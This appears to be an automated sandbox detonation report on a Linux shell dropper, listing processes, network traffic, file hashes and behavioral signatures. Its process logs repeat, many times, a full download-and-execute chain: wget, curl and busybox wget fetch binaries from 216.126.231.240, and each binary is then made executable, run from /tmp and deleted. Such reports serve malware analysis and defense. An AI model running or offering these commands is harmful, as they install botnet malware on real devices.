[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 01:33
Reported
2024-11-14 01:36
Platform
debian9-mipsel-20240729-en
Max time kernel
76s
Max time network
78s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
Processes
/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh
[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
